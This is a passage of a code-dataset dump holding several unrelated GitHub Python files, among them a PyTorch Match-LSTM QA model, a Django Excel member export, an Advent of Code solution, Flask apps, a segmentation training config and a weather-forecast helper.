torch.cat((hr_r, hr_l), 2)\n hr = self.linear(to_2D(hr, self.hidden_dim * 4))\n hr = to_3D(hr, batch_size, self.hidden_dim * 2)\n\n return hr\n\n\nclass LSTMLayer(nn.Module):\n def __init__(self, hidden_dim, bidirectional):\n super(LSTMLayer, self).__init__()\n self.hidden_dim = hidden_dim\n self.bidirectional = bidirectional\n self.num_layers = 1\n self.gru = nn.GRU(self.hidden_dim * 2, self.hidden_dim, num_layers=self.num_layers, dropout=0.2,\n batch_first=bidirectional, bidirectional=True)\n\n def forward(self, hr, hr_h0):\n \"\"\"\n hr: B x D x 2*H\n \"\"\"\n batch_size = hr.size(0)\n hr_h, _ = self.gru(hr, hr_h0)\n\n return hr_h\n\n def init_hidden(self, batch_size, bidirectional=False):\n hidden = next(self.parameters()).data\n if bidirectional == False:\n return Variable(hidden.new(self.num_layers, batch_size, self.hidden_dim).zero_())\n else:\n return Variable(hidden.new(self.num_layers * 2, batch_size, self.hidden_dim).zero_())\n\n\nclass AnsPtr(nn.Module):\n def __init__(self, hidden_dim, cuda=True):\n super(AnsPtr, self).__init__()\n self.hidden_dim = hidden_dim\n self.cuda = cuda\n\n self.initprev = InitPrev(self.hidden_dim)\n self.attn = AnsAttnLayer(self.hidden_dim)\n self.out = OutputLayer(self.hidden_dim)\n self.ptr = PtrNet(self.hidden_dim)\n\n def forward(self, hr, qry_h, dm, qm):\n '''\n hr: B x D x 2*H\n qry_h: B x Q x 2*H\n '''\n batch_size = hr.size(0)\n doc_len = hr.size(1)\n\n if self.cuda:\n output = Variable(torch.zeros(batch_size, doc_len, 2)).cuda()\n else:\n output = Variable(torch.zeros(batch_size, doc_len, 2))\n\n for i in range(2):\n if i == 0:\n prev_ha = self.initprev(qry_h, qm) # B x 2*H\n\n Fi = self.attn(hr, prev_ha, dm) # B x D x H\n beta = self.out(Fi) # B x D\n\n if i == 0:\n output[:, :, i] = beta\n beta = F.softmax(beta)\n beta = padded_attn(beta, dm)\n prev_ha = self.ptr(hr, prev_ha, beta)\n\n elif i == 1:\n output[:, :, i] = beta\n\n return output\n\n\nclass MatchNet(nn.Module):\n def __init__(self, vocab_size, embed_dim, hidden_dim, cuda, num_layers, bidirectional):\n super(MatchNet, self).__init__()\n\n self.hidden_dim = hidden_dim\n self.bidirectional = bidirectional\n self.embed = Embed(vocab_size, embed_dim)\n self.encoder = Encoder(embed_dim, self.hidden_dim, num_layers, bidirectional)\n self.matchlstm = MatchLSTM(self.hidden_dim, cuda)\n self.lstm = LSTMLayer(self.hidden_dim, bidirectional)\n 
self.ansptr = AnsPtr(self.hidden_dim, cuda)\n\n def forward(self, doc, qry, dm, qm):\n batch_size = doc.size(0)\n\n doc, qry = self.embed(doc, qry)\n\n doc_h0 = self.encoder.init_hidden(batch_size, self.bidirectional)\n qry_h0 = self.encoder.init_hidden(batch_size, self.bidirectional)\n hr_h0 = self.lstm.init_hidden(batch_size, self.bidirectional)\n\n doc_h, qry_h = self.encoder(doc, qry, doc_h0, qry_h0)\n hr = self.matchlstm(doc_h, qry_h, dm, qm)\n\n hr_h = self.lstm(hr, hr_h0)\n output = self.ansptr(hr_h, qry_h, dm, qm)\n\n output1 = F.log_softmax((output[:, :, 0]).contiguous().view(batch_size, -1))\n output2 = F.log_softmax((output[:, :, 1]).contiguous().view(batch_size, -1))\n\n return output1, output2\n","repo_name":"muguliebe/st-nlp","sub_path":"03-QA/model.py","file_name":"model.py","file_ext":"py","file_size_in_byte":6833,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"78"} +{"seq_id":"35876569710","text":"from django.http.response import HttpResponse, HttpResponseForbidden\nimport openpyxl\nfrom openpyxl.utils import get_column_letter\nfrom tempfile import NamedTemporaryFile\nfrom .utils import is_admin, getMySelfId\nfrom .models import Team, Member, TeamMember, MemberRole\n\n\ndef email(member):\n if not member.email_adfc:\n return member.email_private\n if not member.email_private:\n return member.email_adfc\n return member.email_adfc if member.pref else member.email_private\n\n\ndef ags(member):\n teamnames = [team.name for team in member.teams.all()]\n return \",\".join(teamnames)\n\n\nheaders = [\n (\"Nachname\", \"last_name\", 20),\n (\"Vorname\", \"first_name\", 20),\n (\"Geschlecht\", \"gender\", 10),\n (\"Geburtsjahr\", \"birthday\", 12),\n (\"Email-ADFC\", \"email_adfc\", 30),\n (\"Email-Privat\", \"email_private\", 30),\n (\"Email\", email, 30),\n (\"Telefon\", \"phone_primary\", 20),\n (\"Telefon-Alternative\", \"phone_secondary\", 20),\n (\"Postleitzahl\", \"address\", 12),\n (\"Mitgliedsnummer\", \"adfc_id\", 17),\n (\"Referenz\", \"reference\", 50),\n (\"AGs\", ags, 50),\n (\"Interessen\", \"interests\", 50),\n (\"Letzter Kontakt\", \"latest_contact\", 20),\n (\"Kommentar\", \"admin_comments\", 50),\n (\"Aktiv\", \"active\", 10),\n (\"Letztes Erste-Hilfe-Training\", \"latest_first_aid_training\", 20),\n (\"Registriert für Erste-Hilfe-Training\",\n \"registered_for_first_aid_training\", 10)\n]\n\n\ndef response(title, members, file, pref):\n if not file.endswith(\".xlsx\"):\n file += \".xlsx\"\n wb = openpyxl.Workbook()\n ws = wb.active\n ws.title = title\n\n ws.append([h[0] for h in headers])\n for member in members:\n member.pref = pref\n ws.append([getattr(member, h[1]) if isinstance(\n h[1], str) else h[1](member) for h in headers])\n for idx, col in enumerate(ws.columns, 1):\n ws.column_dimensions[get_column_letter(\n idx)].width = headers[idx-1][2]\n with NamedTemporaryFile() as tmp:\n wb.save(tmp)\n tmp.seek(0)\n content = tmp.read()\n resp = HttpResponse(\n content, content_type=\"application/vnd.openxmlformats-officedocument.spreadsheetml.sheet\")\n resp.headers[\"Content-Disposition\"] = f\"attachment; filename={file}\"\n return resp\n\n\ndef excelTeam(req, teamId, file, prefEmail):\n members = []\n\n team = Team.objects.get(pk=teamId)\n if not is_admin(req):\n myselfId = getMySelfId(req)\n try:\n # has logged in user role=\"Vorsitz\" in this team?\n teamMember = team.teammember_set.get(member_id=myselfId)\n role = teamMember.member_role\n if role.title != \"Vorsitz\":\n return HttpResponseForbidden()\n except 
Exception as e:\n return HttpResponseForbidden()\n return response(team.name, team.members.order_by(\"last_name\", \"first_name\"), file, prefEmail == \"ADFC\")\n\n\ndef excelMembers(req, file, prefEmail):\n if not is_admin(req):\n return HttpResponseForbidden()\n members = Member.objects.all().order_by(\"last_name\", \"first_name\")\n return response(\"Alle Aktiven\", members, file, prefEmail == \"ADFC\")\n","repo_name":"michaelu123/aktdb","sub_path":"aktivendb/excel.py","file_name":"excel.py","file_ext":"py","file_size_in_byte":3117,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"78"} +{"seq_id":"30402521929","text":"from typing import List, Tuple\n\n\nDIRECTION = {\n 'R': [0, 1],\n 'L': [0, -1],\n 'U': [1, 0],\n 'D': [-1, 0],\n}\n\nWireCoordinates = List[Tuple[int, Tuple[int, int], int]]\n\n\ndef get_closest_travel_distance_of_intersection(wire1: List[str], wire2: List[str]) -> int:\n wire1_vertical, wire1_horizontal = get_wire_coordinates(wire1)\n wire2_vertical, wire2_horizontal = get_wire_coordinates(wire2)\n\n intersections = get_intersection_lengths(wire1_horizontal, wire2_vertical) + get_intersection_lengths(wire2_horizontal, wire1_vertical)\n\n return min(intersections)\n\n\ndef get_wire_coordinates(wire: List[str]) -> (WireCoordinates, WireCoordinates):\n global DIRECTION\n x: int = 0\n y: int = 0\n total_length: int = 0\n vertical_coords: WireCoordinates = []\n horizontal_coords: WireCoordinates = []\n\n for action in wire:\n direction = action[0]\n distance = int(action[1:])\n new_x = x + (distance * DIRECTION[direction][0])\n new_y = y + (distance * DIRECTION[direction][1])\n if direction in 'RL':\n horizontal_coords.append((new_x, (y, new_y), total_length))\n else:\n vertical_coords.append((new_y, (x, new_x), total_length))\n x = new_x\n y = new_y\n total_length += distance\n\n return horizontal_coords, vertical_coords\n\n\ndef get_intersection_lengths(horizontal_coords: WireCoordinates, vertical_coords: WireCoordinates) -> List[int]:\n intersections: List[int] = []\n\n for h_coord in horizontal_coords:\n for v_coord in vertical_coords:\n if min(h_coord[1]) < v_coord[0] < max(h_coord[1]) and min(v_coord[1]) < h_coord[0] < max(v_coord[1]):\n travel_distance1 = v_coord[2] + abs(abs(h_coord[0]) - abs(v_coord[1][0]))\n travel_distance2 = h_coord[2] + abs(abs(v_coord[0]) - abs(h_coord[1][0]))\n intersections.append(travel_distance1 + travel_distance2)\n\n return intersections\n\n\nif __name__ == '__main__':\n wire1 = 'R8,U5,L5,D3'\n wire2 = 'U7,R6,D4,L4'\n print(get_closest_travel_distance_of_intersection(wire1.split(','),wire2.split(',')))\n\n wire1 = \"R75,D30,R83,U83,L12,D49,R71,U7,L72\"\n wire2 = \"U62,R66,U55,R34,D71,R55,D58,R83\"\n print(get_closest_travel_distance_of_intersection(wire1.split(','),wire2.split(',')))\n\n wire1 = \"R98,U47,R26,D63,R33,U87,L62,D20,R33,U53,R51\"\n wire2 = \"U98,R91,D20,R16,D67,R40,U7,R15,U6,R7\"\n print(get_closest_travel_distance_of_intersection(wire1.split(','),wire2.split(',')))\n\n with open('input.txt') as f:\n lines = f.readlines()\n wire1 = lines[0]\n wire2 = lines[1]\n print(get_closest_travel_distance_of_intersection(wire1.split(','),wire2.split(',')))\n","repo_name":"rob256/adventofcode2019","sub_path":"python3/day_3/day_3_part_2.py","file_name":"day_3_part_2.py","file_ext":"py","file_size_in_byte":2716,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"78"} +{"seq_id":"15050818422","text":"from fastapi.testclient import TestClient\n\nfrom 
app.core.config import settings\n\n\ndef test_item_get_multi(client: TestClient) -> None:\n \"\"\"Test the get items endpoint\"\"\"\n r = client.get(f\"{settings.API_VERSION}/item/\")\n assert r.status_code == 200\n\n all_runs = r.json()\n assert len(all_runs) > 0\n","repo_name":"tsladecek/create-fastapi-app","sub_path":"src/cfa/fastapi-app/app/tests/api/v1/test_item.py","file_name":"test_item.py","file_ext":"py","file_size_in_byte":311,"program_lang":"python","lang":"en","doc_type":"code","stars":1,"dataset":"github-code","pt":"78"} +{"seq_id":"7305200081","text":"import os\n\n\ndef get_number():\n user_input = None\n while user_input is None:\n try:\n user_input = float(input())\n except ValueError:\n print('Please, try again and enter only a one float number')\n return user_input\n\n\ndef get_model_properties() -> object:\n print('Please, enter frequency w')\n w = get_number()\n print('Now, please enter dissipation coefficient b')\n b = get_number()\n print('Now, please enter x_0')\n x_0 = get_number()\n print('Now, please enter v_0')\n v_0 = get_number()\n print('At last, enter the duration of a simulation video')\n duration = get_number()\n return [w, b, duration, x_0, v_0]\n\n\ndef run_video(properties, model_func):\n print('we are done!\\nIf you want to run video press 1')\n if get_number() == 1:\n w = properties[0]\n b = properties[1]\n os.system('xdg-open videos/simulation_{name}_omega_{omega}_dissip_{betta}.avi'.format(\n name=model_func.__name__, omega=w, betta=b))\n else:\n print('Ok, if you do not want to run video now, you can do it later manually. Bye!')\n","repo_name":"YanLogovskiy/simulation_of_rotating_bodies","sub_path":"user_interaction.py","file_name":"user_interaction.py","file_ext":"py","file_size_in_byte":1114,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"78"} +{"seq_id":"35535676772","text":"from hashlib import new\nfrom flask_controller import FlaskController\nfrom flaskr.app import app\nfrom flask import render_template, session, request, redirect, url_for, flash\nfrom flaskr.models import db, usuarios\n\nclass usuariosController(FlaskController):\n @app.route(\"/usuarios\")\n def usuarios():\n result_usuarios = usuarios.obtener_usuarios()\n return render_template('usuarios.html', titulo='Gestión de usuarios', lista_usuarios=result_usuarios)\n\n @app.route(\"/crear_usuario\", methods=['GET','POST'])\n def crear_usuario():\n if request.method == 'POST':\n nombre_usuario = request.form.get('usuarios')\n if not nombre_usuario:\n flash('El usuario es un campo obligatorio')\n else:\n usuarios = usuarios(nombre_usuario=nombre_usuario)\n usuarios.crear_usuario(usuarios)\n return redirect(url_for('usuarios'))\n return render_template('crear_usuario.html', titulo='Nuevo usuario')\n\n @app.route(\"/editar_usuario/<int:id>\", methods=['GET'])\n def editar_usuario(id=0): \n usuario = usuarios.obtener_usuario(id) \n return render_template('editar_usuario.html', usuario=usuario, titulo=\"Editar usuario\")\n \n @app.route(\"/actualizar_usuario\", methods=['POST'])\n def actualizar_usuario():\n id_usuario = request.form.get('id')\n nombre_usuario = request.form.get('usuario')\n if not nombre_usuario:\n flash('El usuario es un campo obligatorio')\n else:\n usuario = usuarios.obtener_usuario(id_usuario)\n usuario.nombre = nombre_usuario\n usuarios.actualizar_usuario(usuario=usuario)\n return redirect(url_for('usuarios'))\n \n # Si el flujo llega hasta aquí, significa que ocurrió un error\n flash('Ocurrió un error al actualizar el 
usuario', 'error')\n return redirect(url_for('usuarios'))\n \n @app.route(\"/eliminar_usuario/<int:id>\")\n def eliminar_usuario(id):\n usuarios.eliminar_usuario(id=id)\n return redirect(url_for('usuarios'))\n ","repo_name":"FRANBETM/proyecto-facturacion","sub_path":"flaskr/controllers/usuarios_controller.py","file_name":"usuarios_controller.py","file_ext":"py","file_size_in_byte":2108,"program_lang":"python","lang":"es","doc_type":"code","stars":0,"dataset":"github-code","pt":"78"} +{"seq_id":"17330795327","text":"import os\nimport argparse\nimport shutil\nfrom flask import Flask, render_template, request, flash\n\napp = Flask(__name__)\n\n\ndef argument_parser():\n \"\"\"\n Setting up an argument parser for dynamic port changing\n :return: args\n \"\"\"\n ap = argparse.ArgumentParser()\n ap.add_argument(\"-p\", \"--port\", default=5000,\n help=\"port to run the app on\")\n args = vars(ap.parse_args())\n return args\n\n\n@app.route('/', methods=['GET', 'POST'])\ndef home():\n \"\"\"\n Homepage of the webapp\n :return: Renders the page\n \"\"\"\n return render_template('index.html', data=[{'emotion': 'Please Select an Emotion'}, {'emotion': 'Happy'},\n {'emotion': 'Sad'}, {'emotion': 'Thriller'}])\n\n\n@app.route(\"/generate\", methods=['GET', 'POST'])\ndef generate():\n \"\"\"\n The url redirect to generate API.\n Users can select emotion and generate tunes\n :return: Renders the generate page\n \"\"\"\n input_data = list(request.form.values())\n emotion = input_data[0].lower()\n path = ''\n try:\n if emotion in os.listdir(\"static/generated_songs\"):\n for i in os.listdir(f'static{os.sep}generated_songs' + os.sep + emotion):\n if i.endswith(\"mid\") or i.endswith(\"midi\"):\n print('generated_songs' + os.sep + emotion + os.sep + i)\n shutil.copyfile(f'static{os.sep}generated_songs' + os.sep + emotion + os.sep + i, f\"static{os.sep}staging\" + os.sep + i)\n path = \"staging\" + os.sep + i\n os.remove(f'static{os.sep}generated_songs' + os.sep + emotion + os.sep + i)\n break\n else:\n return render_template('index.html',\n data=[{'emotion': 'Please Select an Emotion'}, {'emotion': 'Happy'},\n {'emotion': 'Sad'}, {'emotion': 'Thriller'}])\n except Exception as e:\n\n print(\"Exception: {}\".format(str(e)))\n\n return render_template('generate.html', path=path,\n data=[{'emotion': 'Please Select an Emotion'}, {'emotion': 'Happy'},\n {'emotion': 'Sad'}, {'emotion': 'Thriller'}])\n\n\nif __name__ == '__main__':\n args = argument_parser()\n app.run(debug=True, port=int(args['port']))\n","repo_name":"gokul-labs/avocado-chair","sub_path":"app.py","file_name":"app.py","file_ext":"py","file_size_in_byte":2328,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"81"} +{"seq_id":"1655118831","text":"import pandas as pd\nfrom argparse import ArgumentParser\nfrom scipy.stats import pearsonr\n\n\ndef main():\n args = get_args()\n df1 = pd.read_csv(filepath_or_buffer=args.pr1,\n sep=\"\\t\",\n header=None,\n names=['caller', 'length', 'precision', 'recall', 'opacity'])\n df2 = pd.read_csv(filepath_or_buffer=args.pr2,\n sep=\"\\t\",\n header=None,\n names=['caller', 'length', 'precision', 'recall', 'opacity'])\n shared_lengths = set(df1[\"length\"]).intersection(set(df2[\"length\"]))\n for feat in ['precision', 'recall']:\n cc, p = pearsonr(df1[df1[\"length\"].isin(shared_lengths)].sort_values('length')[feat],\n df2[df2[\"length\"].isin(shared_lengths)].sort_values('length')[feat])\n print(\"Correlation for {}: {} ; p-value {}\".format(feat, cc, p))\n\n\ndef 
get_args():\n parser = ArgumentParser(\n description=\"Plot precision and recall in function of increasing read length\")\n parser.add_argument(\n \"pr1\", help=\"file with 5 columns, of which 3 and 4 are precision and recall\")\n parser.add_argument(\n \"pr2\", help=\"file with 5 columns, of which 3 and 4 are precision and recall\")\n return parser.parse_args()\n\n\nif __name__ == '__main__':\n main()\n","repo_name":"wdecoster/read_length_SV_discovery","sub_path":"correlation-simulation.py","file_name":"correlation-simulation.py","file_ext":"py","file_size_in_byte":1331,"program_lang":"python","lang":"en","doc_type":"code","stars":3,"dataset":"github-code","pt":"81"} +{"seq_id":"73631185546","text":"from datetime import datetime\nimport requests\nfrom config import api_key\n\n#Definir os dias da semana\ndef retornaDiaSemana(dtTXT):\n seg = 1\n ter = 2\n qua = 3\n qui = 4\n sex = 5\n sab = 6\n dt = datetime.fromisoformat(dtTXT)\n diaSemana = dt.isoweekday()\n if(diaSemana == seg):\n return \"SEG\"\n elif(diaSemana == ter):\n return \"TER\"\n elif (diaSemana == qua):\n return \"QUA\"\n elif (diaSemana == qui):\n return \"QUI\"\n elif (diaSemana == sex):\n return \"SEX\"\n elif (diaSemana == sab):\n return \"SAB\"\n else:\n return \"DOM\"\n\n\ndef retornaHoje():\n hoje = (datetime.today())\n\n minute = ''\n if(hoje.minute <10):\n minute = \"0\"+str(hoje.minute)\n else:\n minute = str(hoje.minute)\n\n hojeFormatado = str(hoje.hour) + \":\"+ minute +\"h - \" + str(hoje.day) + \" de \" +retornaMes()\n return hojeFormatado\n\n\ndef retornaMes():\n hoje = (datetime.today())\n mesAtual = hoje.month\n\n if(mesAtual == 1):\n return \"Janeiro\"\n elif(mesAtual == 2):\n return \"Fevereiro\"\n elif (mesAtual == 3):\n return \"Março\"\n elif (mesAtual == 4):\n return \"Abril\"\n elif (mesAtual == 5):\n return \"Maio\"\n elif (mesAtual == 6):\n return \"Junho\"\n elif (mesAtual == 7):\n return \"Julho\"\n elif (mesAtual == 8):\n return \"Agosto\"\n elif (mesAtual == 9):\n return \"Setembro\"\n elif (mesAtual == 10):\n return \"Outubro\"\n elif (mesAtual == 11):\n return \"Novembro\"\n elif (mesAtual == 12):\n return \"Dezembro\"\n\n\ndef convert_az_to_bearing(a):\n \"\"\"Pega o azimute, que deve ser de 0-360 graus, e retorna uma string N / E / S / W.\n O norte é 0 graus.\"\"\"\n directionWind = \"\"\n if a > 360 or a < 0 or not a:\n directionWind = \"\"\n elif a >= 348.75 or a < 11.25:\n directionWind = \"Norte\"\n elif a >= 11.25 and a < 33.75:\n directionWind = \"Norte-Nordeste\"\n elif a >= 33.75 and a < 56.25:\n directionWind = \"Nordeste\"\n elif a >= 56.25 and a < 78.75:\n directionWind = \"Nordeste\"\n elif a >= 78.75 and a < 101.25:\n directionWind = \"Leste\"\n elif a >= 101.25 and a < 123.75:\n directionWind = \"Leste-Sudeste\"\n elif a >= 123.75 and a < 146.25:\n directionWind = \"Sudeste\"\n elif a >= 146.25 and a < 168.75:\n directionWind = \"Sul-Sudeste\"\n elif a >= 168.75 and a < 191.25:\n directionWind = \"Sul\"\n elif a >= 191.25 and a < 213.75:\n directionWind = \"Sudoeste\"\n elif a >= 213.75 and a < 236.25:\n directionWind = \"Sudoeste\"\n elif a >= 236.25 and a < 258.75:\n directionWind = \"Oeste-Sudoeste\"\n elif a >= 258.75 and a < 281.25:\n directionWind = \"Oeste\"\n elif a >= 281.25 and a < 303.75:\n directionWind = \"Oeste-Noroeste\"\n elif a >= 303.75 and a < 326.25:\n directionWind = \"Noroeste\"\n elif a >= 326.25 and a < 348.75:\n directionWind = \"Noroeste\"\n else:\n directionWind = \"\"\n\n return directionWind + \" (\" + str(a) + \")\"\n\n\ndef 
convert_wind_for_human(speed_wind):\n wind_description = ''\n if(speed_wind < 0.3):\n wind_description = \"Calmo\"\n elif(speed_wind <= 1.5):\n wind_description = \"Aragem\"\n elif (speed_wind <= 3.3):\n wind_description = \"Brisa leve\"\n elif (speed_wind <= 5.4):\n wind_description = \"Brisa fraca\"\n elif (speed_wind <= 7.9):\n wind_description = \"Brisa moderada\"\n elif (speed_wind <= 10.7):\n wind_description = \"Brisa forte\"\n elif (speed_wind <= 13.8):\n wind_description = \"Vento fresco\"\n elif (speed_wind <= 17.1):\n wind_description = \"Vento forte\"\n elif (speed_wind <= 20.7):\n wind_description = \"Ventania\"\n elif (speed_wind <= 24.4):\n wind_description = \"Ventania forte\"\n elif (speed_wind <= 28.4):\n wind_description = \"Tempestade\"\n elif (speed_wind <= 32.6):\n wind_description = \"Tempestada violenta\"\n elif (speed_wind > 32.6):\n wind_description = \"Furacão\"\n\n return wind_description\n\n\ndef convert_ms_km(wind_speed):\n km = wind_speed * 3.6\n\n return round(km,2)\n\n\ndef convert_kelvin_celsius(temp):\n celsius = temp - 273.15\n return round(celsius,2)\n\n\ndef convert_unix_hour(unix):\n hora = datetime.fromtimestamp(unix).strftime('%H:%M')\n return hora\n\n\ndef find_forecasts(cidadeID):\n\n forecast = []\n\n semana = find_index_week(cidadeID)\n\n previsao = {'day':'previsao'}\n url = f'http://api.openweathermap.org/data/2.5/forecast?id={cidadeID}&appid={api_key}&lang=pt_br'\n response = requests.get(url).json()\n lista = response['list']\n\n for linha in semana:\n day = linha['day']\n index = linha['index']\n\n description = lista[index]['weather'][0]['description']\n\n # RETORNANDO O ICON\n icon = lista[index]['weather'][0]['icon']\n\n #RETORNANDO MAIN_TODAY\n temp = lista[index]['main']['temp']\n tempCelsius = str(convert_kelvin_celsius(temp)) + \"ºC\"\n\n #RETORNANDO PRESSAO ATMOSFERICA\n pressure = lista[index]['main']['pressure']\n pressure = str(pressure) + \" hpa\"\n\n #RETORNANDO A HUMIDADE\n humidity = lista[index]['main']['humidity']\n humidity = str(humidity) +\"%\"\n\n # RETORNANDO CLOUDS\n\n clouds = lista[index]['clouds']['all']\n clouds = str(clouds)+\"%\"\n\n # RETORNNDO GEO CODE\n lat = response['city']['coord']['lat']\n lon = response['city']['coord']['lon']\n coords = str(lat) + \", \" + str(lon)\n\n #RETORNANDO STATUS WIND\n wind_deeg = lista[index]['wind']['deg']\n wind_speed = lista[index]['wind']['speed']\n wind_text = convert_wind_for_human(wind_speed)\n wind_status = wind_text +\", \" + str(convert_ms_km(wind_speed)) + \" km/h, \" + convert_az_to_bearing(wind_deeg)\n\n wind_speed = str(convert_ms_km(wind_speed)) + \" km/h\"\n\n #RETORNANDO SUNRISE\n sunrise = response['city']['sunrise']\n sunrise = convert_unix_hour(sunrise)\n\n # RETORNANDO SUNSET\n sunset = response['city']['sunset']\n sunset = convert_unix_hour(sunset)\n\t\n\t#RETORNADO CITY\n city = response['city']['name']\n\n # RETORNADO data\n data = lista[index]['dt_txt']\n date = retorna_dia_mes(data)\n\n novaPrevisaoHoje = {\n \"temp\": tempCelsius,\n \"wind\":wind_status,\n \"cloudiness\": wind_text,\n \"pressure\": pressure,\n \"humidity\":humidity,\n \"sunrise\":sunrise,\n \"sunset\":sunset,\n \"icon\":icon,\n \"date\":date,\n \"clouds\": clouds,\n \"wind_speed\":wind_speed,\n \"coords\": coords,\n \"day\": day,\n\t\t\t\t\"city\": city,\n }\n\n forecast.append(novaPrevisaoHoje)\n\n return forecast\n\n\ndef retorna_dia_mes(dt_txt):\n dt = datetime.fromisoformat(dt_txt)\n\n mes = dt.month\n dia = str(dt.day)\n nomeMes = str(retornaMes_by_int(mes))\n\n return dia+ \" 
de \"+ nomeMes\n\n\n # minute = ''\n # if(hoje.minute <10):\n # minute = \"0\"+str(hoje.minute)\n # else:\n # minute = str(hoje.minute)\n #\n # hojeFormatado = str(hoje.hour) + \":\"+ minute +\"h - \" + str(hoje.day) + \" de \" +retornaMes()\n # return hojeFormatado\n\n\ndef retornaMes_by_int(mes):\n\n if(mes == 1):\n return \"Janeiro\"\n elif(mes == 2):\n return \"Fevereiro\"\n elif (mes == 3):\n return \"Março\"\n elif (mes == 4):\n return \"Abril\"\n elif (mes == 5):\n return \"Maio\"\n elif (mes == 6):\n return \"Junho\"\n elif (mes == 7):\n return \"Julho\"\n elif (mes == 8):\n return \"Agosto\"\n elif (mes == 9):\n return \"Setembro\"\n elif (mes == 10):\n return \"Outubro\"\n elif (mes == 11):\n return \"Novembro\"\n elif (mes == 12):\n return \"Dezembro\"\n\ndef find_index_week(cidadeID):\n semana = []\n diaAtual=\"\"\n url = f'http://api.openweathermap.org/data/2.5/forecast?id={cidadeID}&appid={api_key}&lang=pt_br'\n response = requests.get(url).json()\n lista = response['list']\n\n i = 0\n for linha in lista:\n diaObtido = retornaDiaSemana(lista[i]['dt_txt'])\n\n if diaObtido != diaAtual:\n diaAtual = diaObtido\n dia = {'day':diaAtual,\n 'index':i}\n semana.append(dia)\n\n i = i + 1\n return semana\n\n\n\n\n\n\n\n","repo_name":"dionlaranjeira/api-previsao-python","sub_path":"PrevisaoUtil.py","file_name":"PrevisaoUtil.py","file_ext":"py","file_size_in_byte":8648,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"81"} +{"seq_id":"43170604282","text":"_base_ = [\n '../_base_/default_runtime.py',\n # DAFormer Network Architecture\n # '../_base_/models/daformer_sepaspp_mitb5.py',\n # GTA->Cityscapes Data Loading\n '../_base_/datasets/uda_rural_to_urban_512x512.py',\n # Basic UDA Self-Training\n '../_base_/uda/advseg_model.py',\n '../_base_/schedules/schedule_160k.py'\n]\n# Random Seed\nseed = 0\n# Modifications to Basic UDA\n\ndata = dict(\n train=dict(\n # Rare Class Sampling\n rare_class_sampling=dict(\n min_pixels=3000, class_temp=0.01, min_crop_ratio=0.5)))\n# Optimizer Hyperparameters\nmax_iters = 40000\nmodel = dict(max_iters=max_iters)\noptimizer_config = None\noptimizer = dict(\n type='AdamW',\n lr=6e-05,\n betas=(0.9, 0.999),\n weight_decay=0.01,\n paramwise_cfg=dict(\n custom_keys=dict(\n head=dict(lr_mult=10.0),\n pos_block=dict(decay_mult=0.0),\n norm=dict(decay_mult=0.0))))\nlr_config = dict(\n policy='poly',\n warmup='linear',\n warmup_iters=1500,\n warmup_ratio=1e-06,\n power=1.0,\n min_lr=0.0,\n by_epoch=False)\nn_gpus = 1\nrunner = dict(type='IterBasedRunner', max_iters=max_iters)\n# runner = dict(type='EpochBasedRunner', max_epochs=160)\n# Logging Configuration\ncheckpoint_config = dict(by_epoch=False, interval=2000, max_keep_ckpts=3) #False 40000\nevaluation = dict(interval=2000, metric='mIoU', save_best='mIoU') #, pre_eval=True\n\n# evaluation = dict(interval=100, metric='mIoU') #4000\n# Meta Information for Result Analysis\nname = 'rural2urban_uda_advseg_daformer_mitb5_s0'\nexp = 'basic'\nname_dataset = 'rural2urban'\nname_architecture = 'daformer_sepaspp_mitb5'\nname_encoder = 'mitb5'\nname_decoder = 'daformer_sepaspp'\nname_uda = 'dacs_a999_fd_things_rcs0.01_cpl'\nname_opt = 
'adamw_6e-05_pmTrue_poly10warm_1x2_40k'\n","repo_name":"yixinzhishui/mmsegmentation_rsipac","sub_path":"configs_custom/daformer/rural2urban_uda_advseg_daformer.py","file_name":"rural2urban_uda_advseg_daformer.py","file_ext":"py","file_size_in_byte":1792,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"81"} +{"seq_id":"27565903609","text":"import sys\nfrom queue import *\nsys.setrecursionlimit(10**7)\n\nn, q = list(map(int, input().split()))\n\nadjacent_list = [[] for i in range(n+1)]\nfor i in range(n - 1):\n a, b = map(int, input().split())\n adjacent_list[a].append(b)\n adjacent_list[b].append(a)\ntree_value = [0]*(n+1)\nfor i in range(q):\n p, x = map(int, input().split())\n tree_value[p] += x\nsearched = set()\nused = [0 for i in range(n+1)]\nque = Queue()\nque.put(1)\nwhile que.qsize() != 0:\n m = que.get()\n used[m] = 1\n for i in adjacent_list[m]:\n if not used[i]:\n tree_value[i] += tree_value[m]\nfor i in range(1,n+1):\n print(\"{} \".format(tree_value[i]), end = \"\")\n","repo_name":"Yuta123456/AtCoder","sub_path":"python/AtCoder Beginner Contest 138/Ki.py","file_name":"Ki.py","file_ext":"py","file_size_in_byte":667,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"81"} +{"seq_id":"17945341879","text":"from rest_framework import serializers\n\nfrom spacare.chi_tiet_lich_hen.models import ChiTietLichHen\nfrom spacare.dich_vu.serializers import DichVuSerializer\n\n\nclass ChiTietLichHenSerializer(serializers.ModelSerializer):\n class Meta:\n model = ChiTietLichHen\n fields = \"__all__\"\n extra_kwargs = {\n \"id\": {\"read_only\": True},\n \"created_at\": {\"read_only\": True},\n \"updated_at\": {\"read_only\": True},\n }\n\n\nclass ReadChiTietLichHenSerializer(serializers.ModelSerializer):\n dich_vu = DichVuSerializer(read_only=True)\n\n class Meta:\n model = ChiTietLichHen\n fields = \"__all__\"\n extra_kwargs = {\n \"id\": {\"read_only\": True},\n \"created_at\": {\"read_only\": True},\n \"updated_at\": {\"read_only\": True},\n }\n\n\nclass BulkChiTietLichHenSerializer(serializers.ModelSerializer):\n class Meta:\n model = ChiTietLichHen\n fields = [\n \"dich_vu\",\n \"lich_hen\",\n \"trang_thai\",\n ]\n","repo_name":"DuyViet-Vo/spa-care","sub_path":"spacare/chi_tiet_lich_hen/serializers.py","file_name":"serializers.py","file_ext":"py","file_size_in_byte":1035,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"81"} +{"seq_id":"6644858926","text":"import datetime\nimport os\nfrom pathlib import Path\nfrom typing import Union, Tuple, List\n\nimport numpy as np\nimport pandas as 